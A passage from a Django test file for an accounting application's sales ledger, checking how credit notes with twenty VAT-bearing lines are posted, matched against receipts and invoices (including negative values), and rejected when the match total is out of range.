0
)
self.assertEqual(
receipt.due,
2500
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# CORRECT USAGE
# We've already tested we can match the whole amount and matching 0 does not count
# Now try matching for value in between
def test_matching_a_value_but_not_whole_amount(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, -2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": -1200})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
-1200
)
self.assertEqual(
header.due,
-1200
)
self.assertEqual(
receipt.total,
2400
)
self.assertEqual(
receipt.paid,
1200
)
self.assertEqual(
receipt.due,
1200
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
1200
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
"""
Test negative invoices now. I've not repeated all the tests
that were done for positives. We shouldn't need to.
"""
# CORRECT USAGE
def test_negative_invoice_entered_without_matching(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_negative_invoice_without_matching_with_total(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -2400
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
"""
Test matching negative invoices now
"""
# CORRECT USAGE
def test_fully_matching_a_negative_invoice_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "receipt", 1, self.period, 2400)[0] # NEGATIVE PAYMENT
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 2400})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
2400
)
self.assertEqual(
header.due,
0
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
-2400
)
self.assertEqual(
receipt.due,
0
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
1
)
self.assertEqual(
matches[0].matched_by,
header
)
self.assertEqual(
matches[0].matched_to,
headers[0] # receipt created first before invoice
)
self.assertEqual(
matches[0].value,
-2400
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
def test_selecting_a_transaction_to_match_but_for_zero_value_against_negative_invoice_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "receipt", 1, self.period, 2400)[0] # NEGATIVE PAYMENT
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 2)
receipt = headers[0]
header = headers[1]
self.assertEqual(
header.total,
-20 * (-100 + -20)
)
self.assertEqual(
header.goods,
-20 * -100
)
self.assertEqual(
header.vat,
-20 * -20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
2400
)
self.assertEqual(
receipt.total,
-2400
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
-100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
-20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
100 + 20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
# For an invoice of 2400 the match value must be between 0 and -2400
def test_match_total_less_than_zero_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
invoice_to_match = create_invoices(
self.customer, "invoice to match", 1, self.period, 2000)[0]
headers_as_dicts = [to_dict(invoice_to_match)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 0.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and -2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
invoice_to_match = headers[0]
self.assertEqual(
invoice_to_match.total,
2400
)
self.assertEqual(
invoice_to_match.paid,
0
)
self.assertEqual(
invoice_to_match.due,
2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# INCORRECT USAGE
# Try and match -2400.01 to an invoice for 2400
def test_match_total_less_than_invoice_total_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(
self.customer, "invoice to match", 1, self.period, 2500)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 2400.01})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(
response,
'<li class="py-1">Please ensure the total of the transactions you are matching is between 0 and -2400.00</li>',
html=True
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(len(headers), 1)
receipt = headers[0]
self.assertEqual(
receipt.total,
-2500
)
self.assertEqual(
receipt.paid,
0
)
self.assertEqual(
receipt.due,
-2500
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
0
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all()
self.assertEqual(len(lines), 0)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
0
)
# CORRECT USAGE
# We've already tested we can match the whole amount and matching 0 does not count
# Now try matching for value in between
def test_matching_a_value_but_not_whole_amount_NEGATIVE(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
receipt = create_receipts(self.customer, "receipt", 1, self.period, 2400)[0]
headers_as_dicts = [to_dict(receipt)]
headers_to_match_against = [get_fields(
header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {
"id": "matched_to"}, {"value": 1200})
matching_data = create_formset_data(
match_form_prefix, matching_forms)
line_forms = ([{
'description': self.description,
'goods': -100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': -20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
